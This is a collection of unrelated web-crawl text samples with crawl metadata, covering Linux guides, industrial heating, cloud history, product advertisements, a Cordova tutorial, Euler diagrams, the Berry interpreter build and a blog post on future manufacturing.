able to focus on the active threat actors using the right data to accurately predict which vulnerabilities will be exploited — even before the availability of an exploit.
systems_science
https://www.imagineshop.co.uk/bookazines/linux-and-open-source-genius-guide-vol-4.html?utm_source=LinuxUser.co.uk&utm_medium=product-widget-sidebar-normal&utm_campaign=New-Product-Widget
2017-02-23T21:02:31
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00170-ip-10-171-10-108.ec2.internal.warc.gz
0.832535
520
CC-MAIN-2017-09
webtext-fineweb__CC-MAIN-2017-09__0__182893763
en
Linux has proved to be popular among coders, developers and users with the many customisable services and utilities it offers. The recent worldwide success of the Raspberry Pi has increased its popularity even further as young kids and adults alike discover its multiple uses everyday. With this book, you'll go from Linux intermediate to Linux expert in no time as we have more than 35 tutorials on everything from programming to coding to building stuff you never thought you could do with your operating system. In this bookazine... The ultimate guide for Linux professionals - Guides to building blogs with Django, mastering LibreOffice, backing up and more. - Step-by-step guides for all Linux users. Pro tips & tricks - From building faster web servers to remote desktoping. - The secrets behind the best distros and projects. - Top 10 distress - Build your own cloud Tips and Tricks Put Cinnamon on your distro Manage boot scripts and startup applications Create shared space for your multi-boot system Create multiple servers with OpenVZ Monitoring your server with tmux Manage your wireless network with Wireshark Protect your network with Snort Build a media converter with Python, Qt and FFmpeg Back up your system with Clonezilla SSH tunnelling on insecure networks Create secure remote backups using Duplicity Create professional presentations with Latex Create a powerful static website with nanoc Sync with Google Drive Create a high-performance NAS using GlusterFS Interface a sensor with an Arduino Open source genealogy with Gramps Make a personal wiki with DokuKiwi Publish a book with LyX Plan your projects with Gantt and Planner Build a Linux home server Make a Noughts & Crosses game for Raspberry Pi Build a file server with the Raspberry Pi Create a network of Raspberry Pis Get an app on the Raspberry Pi Store Turn your Pi into an internet radio Master Linux with System Administrator Compile your own kernel Design and code a simple game using Python Make web apps with Python Emulate a Bluetooth keyboard with the Raspberry Pi Create a VPN with the Raspberry Pi Build an Android app with open source tools Build extensions for the GNOME desktop environment Speed up your PHP applications with memcached Distro Super Test RSS feed readers Live USB tools File encryption utilities Free with this issue... DVD containing four live distros, tutorial files in the book and essential software
systems_science
https://heat-processing.com/trade-industry/steel-processing-steeltec-relies-on-abp-induction-heating-system/
2021-09-19T03:58:44
s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780056711.62/warc/CC-MAIN-20210919035453-20210919065453-00658.warc.gz
0.921402
391
CC-MAIN-2021-39
webtext-fineweb__CC-MAIN-2021-39__0__242495564
en
02.09.2021. Steeltec from Emmenbrücke in Switzerland, a member of the Swiss Steel Group, is increasing its flexibility in steel processing. ABP’s ESS induction heater for bars will be installed there this summer. Induction bar heating system The ESS induction heating system, which ABP is installing for Steeltec, consists of six coils and has a length of 8 m. The system is equipped with an IGBT multi-converter, which features a total power of 5,400 kW. ABP’s IGBT technology stands for highest efficiency. Its modular design and plug & play modules makes the customer extremely flexible. Its zone control makes it possible to change the temperature curve according to different parameters. The induction bar heating system is ideal for a variety of processes, such as continuous bar heating or a batch operation. The ESS type enables easy temperature adjustment to be performed for different steel grades while optimising axial and radial temperature distribution. Driven rollers convey the bars through the induction coils and heat them to rolling temperature. Conveying speed and heater output are continuously adjusted to suit the respective production conditions. Focus on efficiency and sustainability What is special about the ABP development is its focus on efficiency and sustainability. For instance, each zone can be regulated individually and the temperature profile can be adjusted accordingly. The ESS boasts low energy consumption, and the coil design relies on a robust construction and a specially developed copper profile for high electrical efficiency. Thermprof® simulation software is also used to simulate and optimise the temperature curve. The ESS control system can be linked to a Level 2 control system for this purpose. As a result, automation potentials can be fully exploited. The ESS control system also offers a wide range of functions to optimally adapt the intermediate heating to the rolling process. (Source: ABP Induction Systems)
systems_science
https://jonbeckett.medium.com/the-accidental-creation-of-the-cloud-9c65f5534d9b
2021-01-20T05:48:51
s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703519923.26/warc/CC-MAIN-20210120054203-20210120084203-00616.warc.gz
0.973547
766
CC-MAIN-2021-04
webtext-fineweb__CC-MAIN-2021-04__0__177127752
en
Back in the early 2000s, the financial analysts at Amazon expressed frustration that much of their spare server capacity went unused for the majority of the time. A group of engineers were tasked with exploring how they might sell the use of their servers to others — and thus history lurched forwards — “the cloud” was invented. While Amazon wrestled with their accidental creation, aided and abetted by an army of Web 2.0 application developers, a series of chess moves were happening deep within Microsoft that are still shaping and changing the way we work today. Microsoft had built their business on the sale of licenses for operating systems and office software. Having done battle with IBM, Apple, Lotus, Wordperfect, and Wordstar, they reached a curious plateau — where those that needed their software already had it, and the effort (and cost) involved in re-inventing their various wheels increasingly became a game of negative returns. Microsoft desperately needed to change the game, but of course Microsoft is Microsoft. Historically, they have never been innovators — they didn’t invent the disk operating system, the windowed operating system, or even the office applications that made them famous — they copied others, and iterated relentlessly. The technology world watched Amazon with envious eyes — not because Amazon had created a ground-breaking product — but because through re-selling the use of infrastructure, Amazon had lucked into the subscription service model — which soon became divorced entirely from hardware through virtualisation. “Software as a Service” had been born. It took Microsoft the better part of a decade to catch up — not least because the products their customers rely on had never been designed to run as headless services. Entire platforms had to be re-imagined from the ground up — while millions of people were still using them. It doesn’t help that people typically don’t like change. We finally appear to be there though. Microsoft called their new world “Azure”, and after a number of re-inventions, and re-imaginings, is now a mature platform. Azure has become an enormous ecosystem of integrated systems. It’s success has become such that there are rumors of the Windows desktop operating system being deprecated entirely : released as a free product, or replaced by a Linux powered simulcra — the same slight of hand Apple performed with OSX. What started perhaps ten years ago as a trickle of early adopters has become an exodus — of corporate server farms moving to the cloud. The math isn’t difficult either — where software as a service requires subscriptions and power users, server farms require architects, administrators, licenses, consultants, specialists, developers, and more — not to mention hardware, disaster recovery plans, and the relentless bleed of depreciating assets. Despite the benefits, many organisations continue to distrust the security and privacy of data stored anywhere outside of infrastructure they own and control. Virtualisation has provided a first step into the new world for many, affording agility in the use of hardware, but at the expense of many of the benefits of the cloud. For the rest, the journey is just beginning — dismantling historic infrastructure, systems, and solutions piece by piece, and migrating them to the new normal. They join a growing community of organisations that were born to the new world — that have never known a server room. It’s a strange thought. In many ways it’s a privilege to be witness to the world changing — to know the old, and embrace the new — to see such progress, and so many opportunities unfold before us. You can find the original copy of this post (and much more) at jonbeckett.com
systems_science
https://opendatacam.markuskreutzer.com/
2024-04-13T22:00:58
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296816853.44/warc/CC-MAIN-20240413211215-20240414001215-00704.warc.gz
0.893667
144
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__87524810
en
OpenDataCam is an accessible, affordable and transparent solution that enables everyone to quantify movements in urban environments. Beside many different kinds of applications, it can be used to measure the effectiveness of interventions in urban environments. Technically, the tool uses computer vision to quantify and track moving objects. Thereby, it never records any photo or video data and processes everything locally. It features a friendly user interface and is fully documented as an open source project to underline transparency and full disclosure on privacy questions. This site documents the design of its visual identity and user interface as well as strategic considerations.
systems_science
https://www.drwehrhahn.com/application/pavement-measurement/laser-system-for-non-contact-recording-of-road-conditions/
2023-09-23T11:47:32
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233506480.7/warc/CC-MAIN-20230923094750-20230923124750-00258.warc.gz
0.946619
195
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__143126780
en
The laser measuring system fitted to a vehicle (truck or mini-van) facilitates the non contact recording of the following condition parameters at a speed of up to 100 km/h: - cross profile of the road - longitudinal road evenness - texture of road topping The sensors' high measuring frequency, and consequently high speed of the measuring vehicle, offers the following advantages: - no obstruction of moving traffic - no need for an additional escorting vehicle - high measuring performance of up to 300 km/day All data measured by the sensors are centrally recorded by a PC in the vehicle and triggered speed-neutral via an incremental transmitter. The vehicle's position is recorded by an GPS-system and allocated to the data. The influence of the vehicle's rolling and pitch angles on the measured values is corrected by an GPS-supported gyroscopic system. The laser sensors are designed in such a way that they can also measure on wet roads.
systems_science
https://rsvpdesign.co.uk/matrix.html
2023-12-05T18:53:29
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100555.27/warc/CC-MAIN-20231205172745-20231205202745-00836.warc.gz
0.952814
626
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__171688959
en
The Matrix activity offers opportunities to explore the effectiveness of different matrix, cell and linear reporting systems within an internal supply chain. It also offers the chance to model organisational networks and flows of information or resources around them. Individuals within the group try to complete their personal targets for the organisation to achieve its goal according to strict rules on how the supply chain network is set up. Each individual must obtain a series of coloured links in a specific order, but can only network with those who they are physically connected with. Sometimes individuals in organisations & complex networks will need to consider the needs of others as well as their own individual targets, and the same is true in this activity. In Matrix, participants are connected to each other by a series of rope connections from one individual to one or more individuals. The rope connections are the ‘supply chains’ across which they can send and receive resources to complete the personal targets they have been set, and collect the correct coloured resources in the correct order. This activity involves working within a collaborative system in which every individual has a specific target that can only be achieved through co-operation with others. The system has strictly enforced rules that must be followed at all times. Participants attempt to achieve their individual goals, whilst also supporting others within the supply chain in achieving their targets. The activity raises questions about flows of information, channels of communication and organisational structures. As a versatile & flexible activity, it offers opportunities to explore the effectiveness of different matrix, cell and linear reporting systems. How to run the activity: Working in a group, up to 16 participants are placed in a supply chain network in which each person has physical connections via extended cords on belts to other people in the network. Within the system are coloured links, representing resources or pieces of information that must be moved around the network via the existing cord connections. Each individual participant has a target card which illustrates a sequence of coloured links to be collected. There are strict rules about how and when the links can be moved. The aim of the exercise is to ensure that the resources / information within the network are managed effectively and efficiently so that every person involved can meet their individual target. Upon completion of an individual target, the individual concerned is removed from the network and the links attached to that belt are removed. Essentially, removing the individual from the supply chain network. Planning for individual completion and exit from the system is important, to ensure that the achievement of individual targets does not compromise the ability of the wider organisation to succeed. Package Weight: 1.8kg Product prices shown do not include delivery costs We use international and local courier services to provide a fast, secure and traceable shipping service to our customers. Typically we will ship within one working day of receiving your order (if received by 14.00 local time), and your goods should be with you wherever you are in the world within one week! We provide a 12 month unconditional guarantee. If you have any problems with our materials, we will replace any defective parts, or you can return the product for a refund.
systems_science
https://threeuv.com/product/roveruv/
2021-10-27T00:32:15
s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587963.12/warc/CC-MAIN-20211026231833-20211027021833-00613.warc.gz
0.828813
282
CC-MAIN-2021-43
webtext-fineweb__CC-MAIN-2021-43__0__283783636
en
Introducing Rover, the first fully autonomous UV-C mobile disinfection robot manufactured in the USA. Unlike manual approaches to disinfection, the UV-C light atop the autonomous mobile robot provides rapid, hands-free, effective inactivation of harmful microorganisms found in the air and on surfaces. Rover kills 99.99% of Covid-19 pathogens and can disinfect over 18,000 sq feet on a single charge without any human interaction. Intelligent sensors enable the robot to avoid obstacles, yet perform safely. Data is made available to track Rover’s runtime, location and disinfection history. Use Rover to regularly disinfect large spaces, and remove the need for expensive chemical cleaning solutions. Equipped with 1140 watts of UV-C, killing 99.99% of Covid-19 pathogens Runs pre-mapped routes reporting disinfection data in real time Built-in sensors detect any human movement, ensuring safety of staff - Kills 99.99% of Covid-19 pathogens - Disinfects over 18,000 sq ft on a single run cycle - Intelligent safety sensors ensure no risk to humans - Fully autonomous, runs pre-programmed routes - Reports real time disinfection data to the cloud - Manufactured in the USA - 1 year warranty - Dimensions 78″ x 24″ x 36″ – Weight 350 lbs
systems_science
https://ccoenraets.github.io/cordova-tutorial/data-storage.html
2023-03-28T08:24:51
s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948817.15/warc/CC-MAIN-20230328073515-20230328103515-00192.warc.gz
0.87309
423
CC-MAIN-2023-14
webtext-fineweb__CC-MAIN-2023-14__0__120637654
en
Open the following files and explore the different persistence services: The application is initially configured to work with the in-memory datastore. To change the local persistence mechanism for the application: In index.html: instead of js/services/memory/EmployeeService.js, import the .js file for the service of your choice, for example: js/services/websql/EmployeeService.js. Test the application. To test the JSON service, make sure the Node.js server provided as part of the materials is running: Open a terminal or command window, and navigate to the server directory under cordova-tutorial Install the server dependencies: Start the server The server implements CORS (Cross-Origin Resource Sharing) to support cross-site HTTP requests. You can therefore invoke the services from a file loaded from another domain or from the file system. Since services/json/EmployeeService.js points to localhost, this will only work when running the application in the browser on your computer, and not on your device because it doesn't know your computer as "localhost". To make the JSON service work when running the application on your device, make sure your computer and device are on the same subnet, identify the ip address of your computer, and replace localhost with that ip address in services/json/EmployeeService.js. As an alternative, you could also deploy the service on a publicly available server. In a real-life application, you would typically externalize the host name in some sort of configuration file. All the other data storage services provided in www/js/services work out-of-the-box when running the application in the browser and on device.
systems_science
https://chipgenius.en.lo4d.com/windows
2019-12-11T18:48:11
s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540532624.3/warc/CC-MAIN-20191211184309-20191211212309-00292.warc.gz
0.900156
333
CC-MAIN-2019-51
webtext-fineweb__CC-MAIN-2019-51__0__115504186
en
ChipGenius is a small and portable application which can quickly extract information from connected USB devices on a PC. The application can be useful in diagnosing issues connected with broken USB flash drives; it can access devices even if they are not visible in Windows' device explorer. All that is required of using ChipGenius is to make sure that the USB devices in question have been connected to the computer. The main interface will display the device description, processing speed, ID data and the device serial number. ChipGenius can be handy in extracting particulars of a USB drive such as the chip vendor and specific part numbers. So whether you're looking to troubleshoot a defective flash drive or a USB keyboard, ChipGenius can be a handy application to extract details of devices that Windows cannot. This download is licensed as freeware for the Windows (32-bit and 64-bit) operating system on a laptop or desktop PC from hardware diagnostic software without restrictions. ChipGenius 4.19.0319 is available to all software users as a free download for Windows 10 PCs but also without a hitch on Windows 7 and Windows 8. Compatibility with this USB device information software may vary, but will generally run fine under Microsoft Windows 10, Windows 8, Windows 8.1, Windows 7, Windows Vista and Windows XP on either a 32-bit or 64-bit setup. A separate x64 version may be available from hit00. We have tested ChipGenius 4.19.0319 against malware with several different programs. Please review the test results. We have not certified this program as clean. [Read more]
systems_science
https://worduser01.wordpress.com/2018/07/12/dod-it-efforts-focus-on-warfighter-competitive-edge-cio-says/
2019-02-23T22:58:47
s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550249556231.85/warc/CC-MAIN-20190223223440-20190224005440-00511.warc.gz
0.862295
114
CC-MAIN-2019-09
webtext-fineweb__CC-MAIN-2019-09__0__40611879
en
DoD IT Efforts Focus on Warfighter, Competitive Edge, CIO Says By Lisa Ferdinando Today’s warfighter needs access to intelligence and communication to enable quick decision-making and maintain a competitive edge, and the Defense Department’s information technology efforts are focused on maintaining this edge and supporting national defense priorities, DoD’s chief information officer said. Published July 11, 2018 at 12:49PM Read more at https://defense.gov from Blogger https://ift.tt/2NITTOF
systems_science
https://regatron.com.au/unlocking-the-potential-of-dual-dc-power-supplies-versatility-and-efficiency-unleashed/
2024-04-15T19:00:44
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817014.15/warc/CC-MAIN-20240415174104-20240415204104-00672.warc.gz
0.904442
278
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__114904671
en
Dual DC power supplies stand as invaluable assets in the realm of electronics, providing a multitude of output voltages concurrently and thereby offering unparalleled flexibility in powering electronic circuits. Their unique capability to furnish both positive and negative voltages renders them particularly well-suited for applications necessitating bipolar voltage rails. Equipped with dedicated voltage regulators and isolation circuitry, dual DC power supplies guarantee precise regulation and stability in output voltages. This steadfast reliability serves as a bulwark against voltage fluctuations, safeguarding sensitive electronic components from potential damage and ensuring the consistent operation of electronic systems. Characterised by their compact and lightweight design, dual DC power supplies exemplify efficiency in space utilisation and integration into electronic systems. Their diminutive footprint not only conserves valuable space but also streamlines the integration process, facilitating seamless incorporation into diverse electronic setups. Furthermore, the independent control afforded to each output voltage empowers users with the ability to manage power distribution efficiently. This autonomy facilitates optimised power consumption and performance, enhancing the overall efficiency and functionality of electronic systems. In essence, dual DC power supplies epitomise versatility and efficiency, emerging as indispensable components across a spectrum of electronic applications. Their ability to deliver precise and stable power outputs, coupled with their compact design and efficient power management capabilities, positions them as cornerstone elements in modern electronic systems, underscoring their indispensable nature in powering various electronic devices and circuits.
systems_science
https://shreegajananinfotech.in/service?service=api_development
2024-04-21T09:18:15
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817729.87/warc/CC-MAIN-20240421071342-20240421101342-00539.warc.gz
0.97005
136
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__3274666
en
API development is the process of creating application programming interfaces (APIs) that allow different software systems to communicate and exchange data with each other. APIs are essentially sets of rules and protocols that define how two or more systems can interact with each other. They enable developers to build applications that can integrate with other systems and access their functionality and data. API development typically involves several steps, such as planning and design, implementation, testing, and deployment. It may also involve working with various technologies and platforms, such as REST and SOAP, as well as security and authentication protocols. APIs are widely used in various industries, such as e-commerce, finance, healthcare, and social media.
systems_science
https://niyamaklogic.wordpress.com/reference-work-on-logic-and-logicians/understanding-euler-diagrammes-and-venn-diagrammes/
2017-03-28T21:28:14
s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218189903.83/warc/CC-MAIN-20170322212949-00026-ip-10-233-31-227.ec2.internal.warc.gz
0.923277
1,670
CC-MAIN-2017-13
webtext-fineweb__CC-MAIN-2017-13__0__108121634
en
1. What are Euler Diagrams? Leonhard Euler (pronounced “Oiler”) was one of greatest mathematicians of all time. Many people claim he was the greatest. One of his lesser known inventions is Euler diagrams, which he used to illustrate reasoning. An Euler diagram is shown above. One of the common interpretations of Euler diagrams is that of set intersection. With this interpretation, the above diagram uses areas to represent sets A, B and C. The diagram also includes areas for the intersections AÇB, AÇC, and AÇBÇC. No area represents the set (not A)ÇC and so the set C is entirely contained in A. Visually, Euler diagrams consist of contours, drawn as simple closed curves. The contours split the plane into zones. A zone can be identified by its containing contours. In the diagram above, the contours are labelled A, B and C and the zones A, B, AB, AC and ABC are present in the diagram (as well as the outside zone which is contained in no contours). Here we associate with each zone a label formed from the contours within which it is contained. This section shows a few examples of where Euler diagrams can be used. Often, Euler diagrams are augmented with extra structures, such as dots, labels or graphs, showing information about what is contained in the various zones. One significant feature of Euler diagrams is their capacity to visualize complex hierarchies. Above is a picture indicating that some animals are in more than one classification, such as “dog” and “cat” which are both pets and mammals. It is not easy to show this sort of relationship with the more usual tree based hierarchical visualization of classifications. VENNFS takes this Euler diagram approach to visualizing file system organization. It allows files to appear in more than one directory in a computer file system. propose using Euler diagrams to visualize large databases using multiple classifications. The original application of Euler diagrams, as a way of diagrammatically demonstrating logic, is widely used in schools, where they are a great aid to teaching set theory. More academic work includes Hammer , who introduced a sound and complete logical system based on Euler diagrams. More expressive reasoning can be achieved by extending the diagrams with graphs. Shin developed the first such formal system. This was extended to Spider and Constraint diagrams by the Visual Modelling Group at the University of Brighton, along with others. An example constraint diagram is shown above. These enhanced Euler diagrams can be seen as hypergraphs, and as such, it should be possible to apply visualization techniques for enhanced Euler diagrams more generally to applications that use hypergraphs. Generating Euler Diagrams Much of the recent research has looked at embedding Euler diagrams in the plane from a textual description of the zones that should appear in the diagram. This work is made more interesting by the presence of wellformedness conditions. Wellformedness restricts the appearance of Euler diagrams, and so to some extent, the more wellformed, the better the comprehension of the diagram. However, some Euler diagrams are not drawable under some wellformedness conditions. Common wellformedness conditions are: - The shape of contours may be restricted to certain shapes such: as circular, oval, rectangular or convex shapes. - Triple points may not be allowed, so that only two contours can intersect at any given point. - Only transverse contour intersections may be allowed, so that lines cannot touch without crossing. - Concurrent contours may not be allowed, so a line segment cannot represent the border of 2 or more contours. - Disconnected zones may not be allowed, so that zones cannot appear more than once in a diagram - Contours should be simple curves, so that contours that cross themselves are not allowed Relaxing these restrictions allows all Euler diagrams to be drawn. Euler himself only drew diagrams with circles, without breaking any of the wellformedness conditions.1 Difference between Euler and Venn Diagrams: Euler diagrams or Euler circles are a diagrammatic means of representing sets and their relationships. They are the modern incarnation of Euler circles, which were invented by Leonhard Euler in the 18th century. Euler diagrams usually consist of simple closed curves in the plane which are used to depict sets. The spatial relationships between the curves (overlap, containment or neither) corresponds to set-theoretic relationships (intersection, subset and disjointness). Euler diagrams discriminate the well-known Venn diagrams which represent all possible set intersections available with the given sets. The intersection of the interior of a collection of curves and the exterior of the rest of the curves in the diagrams is called zone. Thus, in Venn diagrams all zones must be present (given the set of curves), but in an Euler diagram some zones might be missing. In a logical setting, one can use model theoretic semantics to interpret Euler diagrams, within a universe of discourse. In the examples on the right, the Euler diagram depicts that the sets Animal and Mineral are disjoint since the corresponding curves are disjoint, and also that the set Four Legs is a subset of the set of Animals. The Venn diagram which uses the same categories of Animal, Mineral and Four Legs does not encapsulate these relationships. Traditionally the emptiness of a set in Venn diagrams is depicted by shading in the region. Euler diagrams represent emptiness either by shading or by the use of a missing zone. Often a set of well-formedness conditions are imposed; these are topological or geometric constraints imposed on the structure of the diagram. For example, connectedness of zones might be enforced, or concurrency of curves or multiple points might be banned, as might tangential intersection of curves. In the diagram below, examples of small Venn diagrams are transformed into Euler diagrams by sequences of transformations; some of the intermediate diagrams have concurrency of curves. However, this sort of transformation of a Venn diagram with shading into an Euler diagram without shading is not always possible. There are examples of Euler diagrams with 9 sets which are not drawable using simple closed curves without the creation of unwanted zones since they would have to have non-planar dual graphs.2 Venn Diagrams, Euler Diagrams and Leibniz The terms Euler diagram and Venn diagram are often confused. Venn diagrams can be seen as a special case of Euler diagrams, as Venn diagrams must contain all possible zones, whereas Euler diagrams can contain a subset of all possible zones. In Venn diagrams a shaded zone represents an empty set, whereas in an Euler diagram the corresponding zone could be missing from the diagram. This means that as the number of contours increase, Euler diagrams are typically less visually complex than the equivalent Venn diagram, particularly if the number of non-empty intersections is small. Baron notes that Leibniz produced similar diagrams before Euler, however, much of it was unpublished. She also observes even earlier Euler-like diagrams by Ramon Lull in the 13th Century.3 - Euler Diagrams, Brighton, UK September 22-23 2004. Retrieved 13 August 2008. http://www.cs.kent.ac.uk/events/conf/2004/euler/eulerdiagrams.html ,Citation:09-06-2009 - http://en.wikipedia.org/wiki/Euler_diagram ,09-06-2009 - http://www.cs.kent.ac.uk/events/conf/2004/euler/eulerdiagrams.html ,09-06-2009 DESH RAJ SIRSWAL Note: Due to some problems diagrams are not shown in the text, go to the references for details. Last Updated: 30-04-2011
systems_science
https://topwebnews.org/hac-aldine-2023-a-glimpse-into-the-future/
2023-12-02T08:35:36
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100381.14/warc/CC-MAIN-20231202073445-20231202103445-00105.warc.gz
0.910749
445
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__67996108
en
As we enter the latter part of 2023, the HAC Aldine conference showcased the latest innovations, trends, and insights shaping the future. This year’s event was spectacular, with industry leaders, tech enthusiasts, and visionaries coming together to share their knowledge and predictions. Let’s dive into the highlights of HAC Aldine 2023. HAC Aldine: The Rise of Quantum Computing Quantum computing took center stage at HAC Aldine. With advancements in qubit stability and quantum algorithms, experts predict that we are on the brink of a new era where quantum computers will outperform classical computers in numerous tasks, from cryptography to drug discovery. Sustainable Tech: More Than Just a Buzzword The emphasis on sustainability was evident throughout the conference. From eco-friendly gadgets to energy-efficient data centers, the tech industry is making significant strides in reducing its carbon footprint and promoting a more sustainable future. Augmented Reality (AR) & Virtual Reality (VR): Merging Worlds AR and VR technologies have matured significantly over the past few years. At HAC Aldine, we saw demonstrations of immersive educational experiences, virtual tourism, and even AR-enhanced surgeries. The potential applications are limitless, and the line between our physical and virtual worlds is increasingly thin. The Age of Autonomous Vehicles Self-driving cars are no longer just prototypes on test tracks. They’re becoming a part of our daily lives. HAC Aldine showcased the latest in autonomous vehicle technology, emphasizing safety, efficiency, and the potential to revolutionize urban transportation AI Ethics: Navigating the Moral Labyrinth With the rapid advancements in artificial intelligence, ethical considerations have emerged. Panels at HAC Aldine discussed the importance of transparency, fairness, and accountability in AI systems, emphasizing the need for a human-centric approach. HAC Aldine 2023 was a testament to the incredible pace of technological advancement. As we look forward to the innovations and challenges the future holds, one thing is clear: technology will continue to shape our world in ways we can only begin to imagine. The key will be to harness its potential responsibly, ensuring a brighter future for all.
systems_science
https://berry.readthedocs.io/en/latest/source/en/Appendix-B.html
2024-02-21T11:29:15
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947473472.21/warc/CC-MAIN-20240221102433-20240221132433-00534.warc.gz
0.85707
445
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__145600931
en
The source code of the Berry interpreter is written using the ISO C99 standard, and the core code does not rely on third-party libraries, so it has strong versatility. Take the Ubuntu system as an example, execute the following command in the terminal to install the Berry interpreter: apt install git gcc g++ make libreadline-dev git clone https://github.com/berry-lang/berry The Makefile provided in the GitHub repository is built using the GCC compiler. Other compilers can also compile the Berry interpreter correctly. The currently tested and available compilers include GCC, Clang, MSVC, ARMCC and ICCARM. The compiler that compiles the Berry interpreter should have the following characteristics: C compiler that supports the C99 standard C++ compiler supporting C++11 standard (only for native compilation) 32 or 64 bit target platform The C++ compiler is only used to compile map_build tools, so there is no need to provide a C++ cross compiler for the Berry interpreter when cross-compiling, but the user should prepare a native C++ compiler (unless the user can obtain the map_build tool executable file). The following is how to port the Berry interpreter to the user’s project: Add all source files in the src directory to the user project, and the directory should be added to the include path Users need to implement by themselves default files other than berry.c in the directory. If conditions permit, they don’t need to modify them Use map_build tool to generate constant object code and then compile 3. Platform Support¶ Currently Berry interpreter has been tested on some platforms. Windows, Linux and MacOS operating systems running on X86 CPUs can run normally. Embedded platforms that have been tested include Cortex M3/M0/M4/M7. The Berry interpreter should be able to run well on the basis of the necessary C runtime library. At present, when only Berry language core is compiled, the interpreter code generated by the ARMCC compiler is only about 40KiB, and the interpreter can run on a device with only 8KiB of RAM.
systems_science
https://extraordinaryadvisors.com/2018/10/
2023-12-05T02:29:33
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100540.62/warc/CC-MAIN-20231205010358-20231205040358-00749.warc.gz
0.91206
1,567
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__216760399
en
Recently, I was fortunate to see a speech from futurist Peter Diamandis. He spoke about what the future world of work would be like, and specifically talked about the workforce within manufacturing. It’s about to be transformed. Old constraints such as specialization in manufacturing skill set and tooling are going away, new technologies are being added rapidly, and the type of employee needed in manufacturing is going to drastically change, according to Diamandis. New technological capabilities will enable manufacturers to customize everything while turning consumers into inventors. And as price points decline while accessibility increases, manufacturing juggernauts and early-stage startups alike have infinite possibilities ahead. Three Major Shifts 3-D printing farms, smart factories, and autonomous co-bots will turn concepts into commodities overnight. There are about to be three major paradigm shifts: 1. Mass customization: Fixed costs will begin to reach variable costs in the production sphere, meaning companies will no longer fabricate millions of the same product or part. Customer data-driven design will allow for cost-effective, tailor-made commodities and one-off production items. 2. Democratized Invention: Incubator studios and fabrication equipment labs are jumping onto the scene. Flaunting AI-aided robots and swarm 3-D printers that work overnight, these urban workshops basically serve as new testing grounds — the physical hands for digital designs. Whether in-house or entirely outsourced, design-to-production technologies allow anyone to invent. This will eliminate operational costs, fabrication equipment, prototyping, tooling, and far-flung production plants. 3. Smart and Autonomous Factories: Industrial IoT (IIoT) and smart factories are ushering in a new era of autonomous production, severely reducing recalls and freeing corporations to expand product lines. Let’s examine each further. Technological convergence will soon allow startups and corporations alike to personalize products at an unparalleled scale. Artificial intelligence (AI) will go from merely automating production to custom configuring products to meet individual demands. The greatest game-changer of customized manufacturing at-scale is 3-D printing. Previously a niche and prohibitively priced tool, 3-D printing is hitting its exponential growth phase, says Deamandis. By 2021, IDC analysts expect 3-D printing global spending to be nearly $20 billion. With newly accessible design software, companies can customize products such as personalized dentistry products, adapted airplane and auto parts, or microscale fabrication products such as sensors, drug delivery technologies, and lab-on-a-chip applications MX3D, a Dutch company, is using its six-axis robotic arms to 3-D print the Arc Bicycle, a futuristic bike with steel lattice frame. Potentially the greatest breakthrough in its manufacturing process is MX3D’s multiple-axis printing capability, which enables printing from any direction in mid-air. While conventional 3-D printing requires some form of support for objects as they’re printed, multi-axis printing technologies almost entirely eliminate this dependency, opening up incredible new structural possibilities. Smart products and electronics no longer have to be manually embedded with circuitry. Using a wide array of conductive inks, manufacturers can print circuitry directly into their products all at one time with conductive inks. With high thermal stability and at only a few microns thick, evolving conductive inks have the potential to revolutionize hardware production. Cost-effective 3-D printing takes manufacturers directly from design to production, eliminating lengthy design processes, multi-stage prototyping, tooling costs, and mass production, where design becomes adaptable and production is expedited. With Democratized platforms, everyone can be an inventor via newly accessible CAD-like design software and easy-to-use interfaces. New hardware studios and accelerators are springing up daily, eager to collaborate with digital startups and designers by providing the physical building space and manufacturing capacity for now unencumbered entrepreneurs. This allows any manufacturer wanting to build any product to become completely dematerialized. Companies like Playground Global want to take care of material constraints like engineering, fabrication, supply chain management, and distribution. Large companies like 3D Systems and Stratasys are also embracing distributed manufacturing. With its Continuous Build 3D Demonstrator, Stratasys supplies 3-D printers that work simultaneously and are centrally controlled through a cloud-based architecture. With some three billion new minds joining the web as internet connectivity blankets the earth, now we can ask: what will today’s new inventors build? Crowdfunding sources like Kickstarter look to give entrepreneurs a leg up through initial finance. As distributed manufacturing converges with the plunging costs of automated fabrication, we are about to see an explosion of innovative design. Smart and Autonomous Factories For established corporations with high production quotas, industrial IoT, AI, collaborative bots, and new technologies like Li-Fi, are the next frontier. Manufacturers are now using the Internet of Things, whereby device connectivity allows smart products to communicate seamlessly and automate cumbersome tasks. With new sensors, ML tools, and inspection drones coming onto the market, not only can manufacturing equipment correct for errors instantaneously, but production will conform to changing demands in real-time. Smart factories will manufacture smart products through machine-to-machine (M2M) communication with data transfer between smart bots, with the goal of adapting to workflows in real-time. Aiming to eliminate the risk of recalls — one of the most costly and dreaded catastrophes for big manufacturers — AI is coming to the rescue. Landing.ai now produces machine-vision tools that can find microscopic defects in circuit boards and products hidden from our visual range. With precise on-site quality analysis, errors are communicated 